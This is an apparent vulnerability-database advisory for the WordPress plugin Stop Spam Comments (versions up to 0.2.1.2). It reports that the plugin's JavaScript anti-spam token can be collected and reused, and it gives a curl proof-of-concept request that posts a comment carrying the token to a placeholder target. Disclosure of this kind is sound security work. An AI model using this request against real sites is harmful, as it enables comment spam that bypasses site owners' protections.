WordPress Plugin Vulnerabilities
Stop Spam Comments <= 0.2.1.2 - Access Token Bypass
Description
The plugin does not properly generate the Javascript access token for preventing abuse of comment section, allowing threat authors to easily collect the value and add it to the request.
Proof of Concept
Collect the name and value of ssc_key for the target post and use it on the request. curl 'http://target.tld/wp-comments-post.php' -X POST --data-raw 'ssc_key_NAME=VALUE&comment=test&author=test&email=test%40test.tld&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0'
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-08 (about 1 years ago)
Added
2022-08-08 (about 1 years ago)
Last Updated
2023-05-05 (about 1 years ago)